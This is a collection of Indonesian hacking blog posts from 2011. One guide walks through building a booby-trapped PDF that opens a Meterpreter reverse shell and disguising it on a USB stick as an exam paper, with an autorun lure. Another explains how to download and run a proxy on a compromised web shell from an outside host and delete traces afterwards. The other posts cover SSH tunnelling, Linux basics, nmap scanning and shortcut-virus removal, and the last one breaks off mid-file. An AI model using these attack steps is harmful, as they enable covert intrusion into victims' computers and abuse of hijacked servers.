VhesckoT_1601

Hacking Windows Menggunakan USB + Social Engineering Toolkit

2011-08-19T11:26:00.000+07:00

Tools yang digunakan : SET(Social Engineering Toolkit)
O.S yang digunakan : Backtrack 5
Victim O.S : Windows XP SP3 (fungsi autorun = on)

Seperti yang kita ketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya di semua kalangan masyarakat...
Ketika saya masih nge-kost, kadang saya mendengar tetangga sebelah saya bilang sama tetangga sebelahnya lagi "Eh, gue copy dong lagu yang kemaren itu...nih USB nya, ntar kalo udah beres copy lo kasih tau gue aja ya".
Sebenarnya apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB?? jawabannya kita lihat langkah-langkah berikut dibawah ini :
Persiapan :
1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)

Keterangan :
Tulisan Berwarna Merah = command line

Langkah-langkahnya :
1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set

2. Jalankan Social Engineering Toolkit dengan perintah ./set.

3. Pilih Nomor 3 "Infectious File Generator" lalu pilih nomor 1 "File Format Exploit", dan selanjutnya masukkan IP address penyerang(komputer kita)

4. Pilih format exploit yang hendak digunakan...disini saya gunakan menggunakan "Adobe PDF Embedded EXE social engineering".

5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.

Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita pilih nomor 1.

6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 "Windows Meterpreter Reverse_TCP shell"

7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus port 80? nanti lihat di sumber aja ya)

8. Ketika muncul pertanyaan "Do you want to create a listener right now? [yes|no]" pilih YES.

9. Semua file yang berhasil di-generate oleh SET tersimpan pada folder /pentest/exploits/set/autorun, tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut.
masuk ke folder autorun :
cd /pentest/exploits/set/autorun

10. Lakukan perintah ini
pico autorun.inf

11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut. Berikut adalah isi autorun.inf yang saya buat :
[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico
Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.

12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.
mv template.pdf Soal_UAS_2011_Aljabar.pdf

13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.

14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.

15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :

Sukses!

FAQ :
Q : Lalu bagaimana kalau ternyata autorun komputer victim dalam keadaan dimatikan??
A : Sifat manusia itu biasanya ingin tahu & penasaran, pasti segala cara akan ia lakukan agar PDF tersebut terbuka apalagi setelah tahu bahwa Title PDF nya memang penting & menarik untuknya.

Penanggulangan :

Ketika muncul suatu alert atau hal-hal yang tidak wajar saat membuka suatu file dengan ekstensi tertentu, lebih baik batalkan/cancel saja jangan diteruskan.
Matikan autorun / autoplay

Sumber : vishnuvalentino.com

Mempercepat browsing internet dengan Tunnel SSH

2011-07-18T05:50:00.000+07:00

Permasalahan koneksi internet di Negara ini tak akan pernah selesai. Hal ini dikarenakan sifat mendasar pada diri manusia itu sendiri yaitu “Tidak pernah puas”. Jadi.. apabila kita diberi koneksi sampai sekian Giga Byte / Second-pun hal ini tak akan pernah cukup. Inginnya.. semakin cepat dan semakin cepat dan semakin cepat lagi. Apalagi bagi Anda pengguna jasa internet seperti IM2, Matrix, XL, Telkomsel, dan lainnya yang sejenis. Boleh dibilang, untuk buka satu halaman website saja dapat memakan waktu lebih dari 3 menit.

Baiklah, saya mempunyai satu trick untuk menyikapi hal ini, yaitu dengan Tunnel (penjelasan tunnel lebih lengkap oleh r4dy4 http://www.jasakom.com/showthread.php?14337-nanya-tunneling&highlight=tunnel) . Mungkin Anda bertanya-tanya, apa itu tunnel ?. Tunnel berarti terowongan dalam Bahasa Indonesia, jadi apabila Anda melakukan Tunneling berarti Anda membuka jalur / terowongan koneksi dari komputer Anda kemudian ke server tunnel dan diteruskan ke server target. Untuk membuka jalur ini Anda harus mempunyai server tunnel yang melayani koneksi SSH (Secure Shell). Berikutnya Anda harus mempunyai aplikasi SSH Client agar Anda dapat terhubung dengan server tunnel, beberapa SSH Client yang serting digunakan adalah PuTTY dan Bitvise Tunnelier.

Dalam artikel ini, saya akan menggunakan PuTTY, karena ukuran aplikasi ini tidak begitu besar untuk didownload. Setelah semuanya sudah disiapkan ikuti langkah-langkah berikut :

Buka aplikasi PuTTY
Masukkan server tunnel Anda dan port (defaultnya adalah 22)
Pada menu tree di sebelah kiri aplikasi PuTTY, pilih connection-SSH
Centang checkbox “Don’t start a shell or command at all“
Centang checkbox “Enable Compression“.
Pada menu tree di sebelah kiri, pilih connection-SSH-Tunnels
Masukkan nilai port yang Anda inginkan pada kotak masukkan “Source Port“, contohnya : 7212
Pada input pilihan, centang “Dynamic”
Klik tombol “Open”
Apabila benar, putty akan menghubungkan Anda dengan server SSH dan Server akan meminta Autentifikasi pengguna. Masukkan user Anda dan Password. Jika user dan password benar, server akan diam tidak menampilkan pesan apapun lagi.

Sampai disini Anda telah membuka terowongan dari komputer Anda ke server SSH. Berikutnya adalah bagaimana caranya agar koneksi internet Anda dapat melalui terowongan yang Anda buat ?, caranya adalah dengan mengkonfigurasi proxy dari aplikasi yang Anda gunakan. Contohnya, apabila Anda ingin browser firefox Anda melewati terowongan ini, klik menu Tools-Options. Firefox akan membuka sebuah jendela Options, kemudian pilih menu Advanced-Network, klik tombol Settings untuk menampilkan jendela konfigurasi jaringan. Pada pilihan “Configure Proxies to Access the Internet” pilihlah “Manual proxy configuration” dan uncentang kotak checkbox “Use this proxy server for all protocols”. Kosongkan semua kotak masukan Protocol dan masing-masing port nya. Isikan kotak masukan “SOCKS Host” dengan nilai 127.0.0.1 dan port nya adalah 7212. Klik OK untuk menutup jendela konfigurasi jaringan.

Sekarang silahkan Anda uji koneksi internet Anda yang sekarang dengan membuka salah satu website, gimana ? seharusnya menjadi lebih cepat.

Credit : Jasakom.com

Installing Proxy In Web Injection

2011-07-14T22:38:00.001+07:00

1. masuk ke shell anda, baik shell resmi maupun shell injek
2. cari direktori yang memberikan permission 777 dengan command find / -perm 777 -type d
3. jika ga ada, langsung aja menuju direktori /tmp atau /dev/shm/ bisanya yang memberikan permission 777
4. dowload atau upload file proxynya, commandnya wget http://jatimcom.uni.cc/irc/proxy.tgz atau lwp-download http://jatimcom.uni.cc/irc/proxy.tgz atau download dulu file proxynya terus upload manual ke shell

5. next, anggap udah ada file proxynya di shell maka harus diextract dulu file tersebut dengan command tar zvxf proxy.tgz atau tar -zxvf proxy.tgz habis di extract jangan lupa di del filenya buat ngilagin jejak, dengan command rm -fproxy.tgz atau rm -rf proxy.tgz
6. setelah diextract, masuk ke direktori pro dengan command cd pro
7. eksekusi filenya dengan command adalah ./xh -s Nama Prosesnya ./prox -a -d -pPortnya
Contoh ./xh -s /usr/bin/ ./prox -a -d -p5050 dimana 5050 adalah portnya. anda bisa menggantinya menurut keinginan anda
8. kalo sudah di eksekusi jangan lupa di del direktori proxynya tadi9. cek hidup atau tidaknya proxy anda di IRC channel yang terdapat bot untuk cek ip.

credit : http://mc-crew.info/

Simple Command in Linux

2011-07-14T22:31:00.000+07:00

1. pwd
pwd (present working derektory) ialah perintah untukmelihat direktori kerjasekarang atau mudahnya untuk melihat posisi kursor sekarang
$pwd
/home
2. cd (change directory(
cd digunakan untuk berpindah direktori. sintaknya adalah
cd nama_direktoyi:
$ ls
ftp httpd Xrobot
untuk berpindah ke direktory Xrobot perintah yank di gunakana
$ cd Xrobot

3. su (subtitute user)
perintah su di gunakan untuk berpindah user )switch)
sintaknya adalah :
$ su nama_user
namun jika berpindah ke user root tinggal ketik su saja
4. ls (list
perintah ‘dir’ pada DOS digunakan untuk melihat isi direktori. sedang untuk shell digunakan ‘ls’. namun juga mengenal perintah
dir yank mempunyai autput yank sama dengan ls
sintaknya
$ ls
perintah atas di gunakan untuk menampilkan isi direktori. seperti halnya windows, linux juga memiliki hidden (nama file yank di awalai dengan tanda titik, berarti file hidden). untuk menampilkan file hidden, tambahkan atribut ‘-a’ pada ls. huruf ‘a’ berarti menampilkan semua (all)file tanpa kecuali.
sintaknya
$ ls -a
untuk menampilkan file lengkap dengan ukuran
$ ls -l
jika atribut a dan l di gabung
$ ls -al
5. cat (Concatenate)
perintah cat digunakan untuk melihat isi file layak perintah type dalam windows
sintaknya
$ cat nama_file
6. mkdir (make dir)
perintah membuat forlder
$ mkdir nama_folder
7 rmdir (remove directory)
perintah unuk menghapus folder atau direktori
$ rmdir nama_direktori
8. rm (remove
untuk menghapus file
$ rm nama_file
9. cp (copy)
perintah unuk mengkopi file
$ cp nama file tujuan
10. mv (move)
untuk membuat dan menghapus file yank sudah ada dan memindah file ke deriktory lain, dan juga merubah atau me rename falie
$ mv nama_file xrobot/
$mv nama_file_lama nama_file_baru
11. more
perintah ini sama dengan fungsi cat, yaitu melihat isi file, tapi sekarang akan ditunjukkan bagaimana menggabungkan isi dari 2 file menjadi satu tanpa menghapus masing masing isi
buat dua buah file coba.txt test.txt
$vi coba.txt
tekan ‘i’, ketikkan kalimat “kalimat ini saya tulis tes tes’. tekan tombol esc –> (:) lanjutkan dengan ketik wq
$ cat coba.txt
kalimat ini saya tulis tes tes
sekarang buat test.txt dengan isi yank berbeda….caranya sama..isinya “asem kancrut”
sekarang dua file tersebut kopilah isi file coba.txt ke dalam test.txt
sintaknya
$ more coba.txt >> test.txt
tanda >> berarti memasukkan suatu kejadian. tanda tersebut meng-overwrite isi file yank terdapat di dalam test.txt. tetapi jika anda hanya menggunakan tanda > saja maka isi file test.txt akan di hapus dan di ganti dengan isi filecoba.txt.
12. locate
mencari lokasi file
sintaknya
$ locate nama_file
13. ingin reebot harus jadi root dulu
#/sbin/reboot
14 shoutdown
#/sbin/shoutdown -h now
15. untuk menghapus layer ketik clear atau dengan tekan ctrl + l

Tutorial NMAP

2011-07-13T20:40:00.000+07:00

Tutorial NMAP – Mungkin bagi para hacker, tool ini merupakan salah satu yang harus dikuasai dan sering digunakan karena tool ini simple dan ampuh yang digunakan untuk mengetahui host, service, sistem operasi yang digunakan oleh sistem yang akan dimasuki. Tetapi kita memepelajari ini bukan untuk menjahili orang lain dan merusak sistem orang lain, mungkin hanya untuk pengetahuan yang harus dipelajari untuk digunakan secara positif.

Nmap merupakan sebuah tool yang sudah sangat terkenal ,saking terkenalnya bahkan digunakan oleh sebuah film yang sangat terkenal. Ya siapa yang tidak tahu film Matrix Reloaded ,kalau anda teliti di akhir film itu Trinity menggunakan nmap untuk membobol sistem komputer tenaga listrik darurat yang membuat bangga pembuat tool ini yaitu Fyodor. Ya Fyodor bangga karena Matrix satu-satunya film holywood yang menggunakan metode membobol yang sungguhan tidak seperti Swordfish atau Hackers yang tidak Pernod menunjukkan cara sungguhan. Tetapi sekali lagi saya peringatkan jangan menggunakannya pada system oranglain karena itu perbuatan ilegal dan melanggar hukum yang bisa membuat anda dipenjara.

1.Instalasi Nmap

Nmap yang merupakan singkatan dari Network Mapper merupakan tools para hacker yang digunakan untuk melakukan pemetaan suatu jaringan. Dengan Nmap dapat diketahui, komputer atau host mana yang aktif dan kira-kira dapat di eksploitasi lebih lanjut. Nmap tersedia di berbagai sistem operasi mulai dari Unix, Linux hingga Windows. Anda dapat mendownload di http://www.nmap.org atau http://www.insecure.org/nmap. Pada tulisan ini kami pergunakan Nmap dengan sistem operasi Windows. Namun demikian kami tidak menggunakan versi grafis melainkan versi text atau command line, sehingga instruksi atau command line yang sama dapat Anda lakukan pada sistem operasi lainnya seperti Linux, Unix dan keluarganya. Instalasi Nmap versi windows sangat mudah, yang Anda harus lakukan adalah sebagai berikut:

1. Install Winpcap versi 2.1-beta atau versi yang lebih baru dari http://winpcap.polito.it/, yaitu WinPcap_3_0.exe (versi yang dipakai ketika tulisan ini dibuat)
2. Reboot
3. Download file program Nmap dari www.nmap.org , yaitu nmap-3.45-win32.zip (versi ketika tulisan ini dibuat)
4. Unzip file tersebut menggunakan Winzip atau utility dekompresi lainnya.

2.Memulai Nmap
Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa yang tersedia dari Nmap. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui option yang tersedia dari Nmap, cukup memanggil Helpnya sebagai berikut:

C:\>nmap -h

Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]

Some Common Scan Types (‘*’ options require root privileges)

* -sS TCP SYN stealth port scan (default if privileged (root))

-sT TCP connect() port scan (default for unprivileged users)

* -sU UDP port scan

-sP ping scan (Find any reachable machines)

* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)

-sR/-I RPC/Identd scan (use with other scan types)

Some Common Options (none are required, most can be combined):

* -O Use TCP/IP fingerprinting to guess remote operating system

-p ports to scan. Example range: ’1-1024,1080,6666,31337′

-F Only scans ports listed in nmap-services

-v Verbose. Its use is recommended. Use twice for greater effect.

-P0 Don’t ping hosts (needed to scan www.microsoft.com and others)

* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys

-T
General timing

policy

-n/-R Never do DNS resolution/Always resolve [default: sometimes

resolve]

-oN/-oX/-oG Output normal/XML/grepable scan logs to

-iL Get targets from file; Use ‘-’ for stdin

* -S /-e Specify source address or network

interface

–interactive Go into interactive mode (then press h for help)

–win_help Windows-specific features

Example: nmap -v -sS -O www.my.com 192.168.0.0/16 ’192.88-90.*.*’

SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

C:\

Cara yang paling sederhana untuk mengetahui apakah sebuah komputer atau host aktif atau tidak aktif adalah dengan menggunakan perintah ping sebagai berikut:

C:\>ping server1

Pinging server1 [128.1.10.25] with 32 bytes of data:

Reply from 128.1.10.25: bytes=32 time<10ms TTL=128

Ping statistics for 128.1.10.25:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>

Hasil reply di atas menunjukkan bahwa host server1 sedang aktif alias tidak mati. Jika hostnya sedang tidak aktif alias mati hasilnya adalah sebagai berikut:

C:\>ping 192.168.1.95

Pinging 192.168.1.95 with 32 bytes of data:

Request timed out.

Ping statistics for 192.168.1.95:

Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>

Nah yang menjadi masalah dan bikin pusing adalah bagaimana jika Anda (hacker) ingin mencari tahu apakah ada host yang aktif dalam sebuah network perusahaan tertentu yang terhubung ke internet. Jika network perusahaan tersebut merupakan network kelas C maka jumlah host maksimalnya adalah 256 host. Jadi jika harus menggunakan perintah ping satu per satu, berapa kali Anda harus mengetikkan perintah ping tersebut ? Wah, tentu saja membutuhkan waktu yang lama dan tentu saja bikin pusing dan males. Nmap memberikan solusi yang cepat. Misalnya Anda ingin memeriksa apakah ada host yang aktif pada network kelas C dengan nomor IP 192.168.1.91 s/d 192.168.1.100 Maka Anda dapat memeriksa dengan perintah sebagai berikut:

C:\> nmap -sP 192.168.1.91-100

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 15:40

SE Asia

Standard Time

Host NARUTO (192.168.1.91) appears to be up.

Host SASUKE (192.168.1.92) appears to be up.

Host SAKURA (192.168.1.93) appears to be up.

Host NEJI (192.168.1.94) appears to be up.

Host LEE (192.168.1.96) appears to be up.

Host KIBA (192.168.1.97) appears to be up.

Host COUJI (192.168.1.98) appears to be up.

Host ADMINISTRASI (192.168.1.100) appears to be up.

Nmap run completed — 10 IP addresses (8 hosts up) scanned in 9.880

seconds

C:\>

Perhatikan hasil Nmap di atas bahwa dari 10 host yang discan ternyata hanya ditemukan 8 host yang aktif, IP 192.168.1.95 dan IP 192.168.1.99 tidak ditemukan atau tidak aktif atau mungkin memang tidak ada.Mudah saja bukan.
Option –sP merupakan salah satu type scanning dari Nmap berbasis ICMP, dimana umumnya dipergunakan untuk melakukan ping terhadap sejumlah IP sekaligus. Harap diperhatikan bahwa –sP bersifat case sensitive. Jika anda menggunakan –sp maka perintah tersebut tidak dikenal.
Pada umumnya server-server web publik yang baik selalu berada dibelakang firewall, sehingga biasanya proses ping dapat diblokir apabila melewati router atau firewall tersebut, akibatnya Anda tidak dapat mendeteksi apakah server web tersebut aktif atau tidak. Untuk itu diperlukan teknik lainnya untuk memastikan apakah server web tersebut dalam kondisi hidup atau tidak. Perhatikan contoh hasil ping pada server web yang berada di belakang firewall berikut ini:

C:\>ping webserver

Pinging webserver [128.1.7.13] with 32 bytes of data:

Request timed out.

Ping statistics for 128.1.7.13:

Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>

Nmap dapat dipergunakan untuk menyiasati masalah diatas yaitu dengan melakukan scanning terhadap port yang terbuka dari host target. Jika host yang menjadi target pemeriksaan adalah server web, maka umumnya akan membuka port 80 http. Dengan memanfaatkan port 80, maka Anda dapat mendeteksi apakah host target tersebut dalam keadaan hidup atau mati.

C:\> nmap -sP -PT80 128.1.7.13

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 16:42

SE Asia

Standard Time

Host webserver (128.1.7.13) appears to be up.

Nmap run completed — 1 IP address (1 host up) scanned in 3.890 seconds

C:\>

Option –PT80 menunjukkan port yang akan dimanfaatkan adalah port 80. Default dari Nmap adalah port 80, jadi sebenarnya Anda dapat mencantumkan –PT saja untuk menunjukkan proses scanning melalui port 80.

Selanjutnya Anda dapat pula menguji coba untuk port umum lainnya. Misalnya jika host yang menjadi target Anda adalah mail maka Anda dapat menguji dengan port 25 (SMTP) atau port 110 (POP3), demikian seterusnya.

3.Port Scanning

Port scanning adalah proses koneksi ke port-port TCP atau UDP pada host yang menjadi target untuk menentukan service apa yang sedang berjalan (Listening). Dengan mengidentifikasi port-port yang listening ini Anda dapat menentukan jenis aplikasi dan sistem operasi apa yang dipergunakan pada host tersebut. Service yang dalam status listening ini memungkinkan orang yang tidak berhak menerobos ke dalam host tersebut.

Untuk mengetahui port apa saja yang listening dari sebuah host dapat menggunakan cara sebagai berikut:

C:\> nmap -sS 128.1.71.103

Starting nmap V. 3.00 ( www.insecure.org/nmap )

Interesting ports on (128.1.71.103):

(The 1589 ports scanned but not shown below are in state: closed)

Port State Service

7/tcp open echo

9/tcp open discard

13/tcp open daytime

17/tcp open qotd

19/tcp open chargen

80/tcp open http

135/tcp open loc-srv

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

1026/tcp open LSA-or-nterm

1031/tcp open iad2

Nmap run completed — 1 IP address (1 host up) scanned in 5 seconds

C:\>

Option –sS merupakan salah satu type scanning dari Nmap yaitu TCP SYN scan yang dipergunakan untuk mendeteksi port apa saja yang terbuka. Teknik ini sering disebut Half Open scan karena dalam melakukan evaluasi terhadap port tidak membuka hubungan komunikasi TCP/IP secara penuh. Artinya secara teknis komputer yang Anda pergunakan untuk mendeteksi port tersebut akan mengirimkan paket SYN ke host target. Jika SYN|ACK paket dikirim balik, berarti port tersebut tertutup. Setelah memperoleh paket balasan, komputer Anda akan menjawab dengan paket RST untuk me-reset hubungan yang hampir terjadi tersebut (itu sebabnya disebut half Open). Teknik ini hampir tidak terdeteksi oleh host target yang tidak secara maksimal mencatat aktifitas portnya. Istilah kerennya –sS adalah stealth scan atau scan yang tidak terdeteksi.

Untuk melakukan scan port tertentu dapat menggunakan option –p sebagai berikut:

C:\>nmap -sS -p 21,23,25,53,80,110 adminristek

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-30 14:50 SE

Asia

Standard Time

Interesting ports on adminristek (128.1.9.81):

PORT STATE SERVICE

21/tcp open ftp

23/tcp open telnet

25/tcp open smtp

53/tcp closed domain

80/tcp open http

110/tcp closed pop-3

Nmap run completed — 1 IP address (1 host up) scanned in 1.590 seconds

C:\>

Perhatikan bahwa terdapat port 53 yang sedang tidak terbuka alias close.

Lebih Jauh tentang Jenis Port Scanning pada Nmap

Setiap pengelola sistem memiliki strategi pengamanan yang berbeda-beda. Untuk itu cara-cara yang telah dijelaskan di atas mungkin tidak selalu dapat diterapkan. Nmap sendiri memberikan beberapa teknik port scanning untuk menghadapi “medan” tempur yang berbeda-beda. Untuk itu terkadang dibutuhkan latihan dan kreatifitas yang tinggi bagi Anda yang ingin menembus sistem pertahanan lawan tanpa diketahui pemiliknya (Oops, kami tidak menyarankan apalagi memprovokasi Anda lho). Diatas telah diperkenalkan beberapa option dari Nmap yang merupakan teknik scan. Berikut ini teknik scan lanjutan yang dapat Anda manfaatkan sesuai dengan medan tempur yang ada:

a. TCP connect scan -sT

Jenis scan ini terhubung ke port host target dan menyelesaikan three-way handshake (SYN, SYN/ACK dan ACK) Scan ini mudah terdeteksi oleh pengelola host target.

b. TCP SYN Scan -sS

Teknik ini dikenal sebagai half-opening scanning karena suatu koneksi penuh tidak sampai terbentuk. Suatu paket SYN dikirimkan ke port host target. Bila SYN/ACK diterima dari port host target, maka Anda dapat mengambil kesimpulan bahwa port tersebut dalam status listening. Jika RST/ACK Anda terima, biasanya menunjukkan bahwa port tersebut tidak listening. Suatu RST/ACK akan dikirim oleh mesin yang melakukan scanning sehingga koneksi penuh tidak akan terbentuk. Teknik ini bersifat siluman dibandingkan dengan TCP koneksi penuh dan tidak akan tercatat pada log host target.

c. TCP FIN scan –sF

Teknik ini mengirimkan suatu paket FIN ke port host target. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk setiap port yang tertutup. Teknik ini hanya dapat dipakai pada stack TCP/IP berbasis Unix.

d. TCP Xmas tree scan -sX

Teknik ini mengirimkan suatu paket FIN, URG dan PUSH ke port host target. Berdasarkan RFC 793, host target akan mengembalikan suatu RST untuk semua port yang tertutup.

e. TCP Null scan -sN

Teknik ini membuat off semua flag. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk semua port yang tertutup.

f. TCP ACK scan -sA

Teknik ini digunakan untuk memetakan set aturan firewall. Hal ini sangat membantu Anda dalam menentukan apakah firewall yang dipergunakan adalah simple packet filter yang membolehkan hanya koneksi penuh saja (koneksi dengan bit set ACK) atau suatu firewall yang menjalankan advance packet filtering.

g. TCP Windows scan -sW

Teknik ini dapat mendeteksi port-port terbuka maupun terfilter/tidak terfilter pada sistem-sistem tertentu seperti pada AIX dan Free BSD sehubungan dengan anomali dari ukuran windows TCPnya.

h. TCP RPC Scan -sR

Teknik ini spesifik hanya pada sistem Unix dan digunakan untuk mendeteksi dan mengidentifikasi port RPC dan program serta nomor versi yang berhubungan dengannya

i. UDP Scan -sU

Teknik ini mengirimkan suatu paket UDP ke port host target. Bila port host target memberikan response pesan berupa “ICMP port unreachable” artinya port ini tertutup. Sebaliknya bila tidak menerima pesan tersebut, Anda dapat menyimpulkan bahwa port tersebut terbuka. Karena UDP dikenal sebagai connectionless protocol, maka akurasi teknik ini sangat bergantung pada banyak hal sehubungan dengan penggunaan jaringan dan sistem reources lainnya.

Apapun teknik port scan yang akan Anda pergunakan, Anda perlu berhati-hati dalam menggunakan terhadap host target. Tindakan Anda melakukan port scanning ke host target yang bukan wewenang Anda dapat saja menimbulkan reaksi yang mungkin tidak Anda duga sebelumnya dari pengelola host target seperti serangan balik, pemblokiran terhadap acount oleh ISP dan sebagainya. Jadi sebaiknya Anda menguji coba pada sistem Anda sendiri.

3.Mendeteksi Sistem Operasi

Cara klasik mendeteksi sistem operasi host tertentu sebenarnya dapat dilakukan dengan cara menggunakan telnet sebagai berikut:

#telnet hpux.u-aizu.ac.jp

Trying 163.143.103.12 …

Connected to hpux.u-aizu.ac.jp.

Escape character is ‘^]’.

HP-UX hpux B.10.01 A 9000/715 (ttyp2)

Pengelola sistem komputer yang pengalaman tentu saja tidak akan memberikan banner sistem operasi dengan begitu saja dan biasanya fasilitas banner tersebut mereka memodifikasi atau dihilangkan. Jika hal tersebut terjadi, Anda dapat mencoba dengan cara lain misalnya melalui service yang terbuka semisal FTP sebagai berikut:

# telnet ftp.netscape.com 21

Trying 207.200.74.26 …

Connected to ftp.netscape.com.

Escape character is ‘^]’.

220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready.

SYST

215 UNIX Type: L8 Version: SUNOS

Namun demikian, semua yang default sekali lagi biasanya diubah oleh pengelola sistem komputer. Untuk itu maka umumnya para hacker langsung memanfaatkan Nmap !

Untuk mendeteksi sistem operasi dari host target, sebenarnya Anda dapat menganalisa dari hasil port scanning di atas. Apabila Anda menemukan port 139 dan 135 terbuka, maka besar kemungkinan bahwa host target adalah Windows NT. Windows NT umumnya listen pada port 135 dan 139. Berbeda dengan listen pada windows 95/98 yang hanya listen pada port 139. Aktifnya beberapa port di sistem Unix juga dapat mencirikan jenis sistem operasi tersebut.

Penggunaan option –O diperuntukan untuk mendeteksi jenis sistem operasi, sebagai berikut:

C:\> nmap -O ristbook

Starting nmap V. 3.00 ( www.insecure.org/nmap )

Interesting ports on ristbook (128.1.71.103):

(The 1589 ports scanned but not shown below are in state: closed)

Port State Service

7/tcp open echo

9/tcp open discard

13/tcp open daytime

17/tcp open qotd

19/tcp open chargen

80/tcp open http

135/tcp open loc-srv

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

1026/tcp open LSA-or-nterm

1031/tcp open iad2

Remote operating system guess: Windows Millennium Edition (Me), Win 2000,

or Win XP

Nmap run completed — 1 IP address (1 host up) scanned in 2 seconds

C:\>

Berikut ini contoh untuk hasil pada sistem operasi Linux:

C:\> nmap -O adminristek

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 18:01

SE Asia

Standard Time

Interesting ports on adminristek (128.1.9.81):

(The 1646 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

21/tcp open ftp

23/tcp open telnet

25/tcp open smtp

79/tcp open finger

80/tcp open http

98/tcp open linuxconf

113/tcp open auth

139/tcp open netbios-ssn

513/tcp open login

514/tcp open shell

1984/tcp open bigbrother

Device type: general purpose

Running: Linux 2.1.X|2.2.X

OS details: Linux 2.1.19 – 2.2.25, Linux 2.2.19 on a DEC Alpha

Nmap run completed — 1 IP address (1 host up) scanned in 12.020 seconds

C:\>

Berikut ini contoh untuk hasil pada sebuah Cisco 1750:

C:\> nmap -sS -O 128.1.8.5

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-30 15:18

SE Asia

Standard Time

Interesting ports on 128.1.8.5:

(The 1655 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

23/tcp open telnet

79/tcp open finger

Device type: router|switch

Running: Cisco IOS 11.X

OS details: Cisco switch/router with IOS 11.1(7)-11.2(8.10), Cisco

Router/Switch

with IOS 11.2

Nmap run completed — 1 IP address (1 host up) scanned in 30.160 seconds

C:\>

Jika host target hanya membuka port 80 (http), maka kita dapat mensiasati dengan port scanning melalui port tersebut sebagai berikut:

C:\>nmap -PT80 -O webserver

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 18:55

SE Asia

Standard Time

Interesting ports on webserver (128.1.7.13):

(The 1647 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

25/tcp open smtp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1027/tcp open IIS

1433/tcp open ms-sql-s

1503/tcp open imtc-mcs

1720/tcp open H.323/Q.931

3372/tcp open msdtc

Device type: general purpose

Running: Microsoft Windows 95/98/ME|NT/2K/XP

OS details: Microsoft Windows Millennium Edition (Me), Windows 2000

Professional

or Advanced Server, or Windows XP

Nmap run completed — 1 IP address (1 host up) scanned in 7.520 seconds

Cara Menghilangkan Virus Shortcut

2011-07-07T00:00:00.001+07:00

CARA 1 MENGHAPUS VIRUS SHORTCUT:

Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut:

1. Nonaktifkan ‘System Restore’ untuk sementara selama proses pembersihan.

2. Putuskan komputer yang akan dibersihkan dari jaringan.

3. Matikan proses virus yang aktif di memori dengan menggunakan tools ‘Ice Sword’. Setelah tools tersebut terinstal, pilih file yang mempunyai icon ‘Microsoft Visual Basic Project’ kemudian klik ‘Terminate Process’. Silahkan download tools tersebut di http://icesword.en.softonic.com/

4. Hapus registri yang sudah dibuat oleh virus dengan cara:
-. Klik menu [Start]
-. Klik [Run]
-. Ketik REGEDIT.exe, kemudian klik tombol [OK]
-. Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
-. Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%].

5. Disable autoplay/autorun Windows. Copy script di bawah ini pada program notepad kemudian simpan dengan nama REPAIR.INF, install file tersebut dengan cara: Klik kanan REPAIR.INF –> INSTALL

[Version]

Signature=”$Chicago$”

Provider=Vaksincom

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”

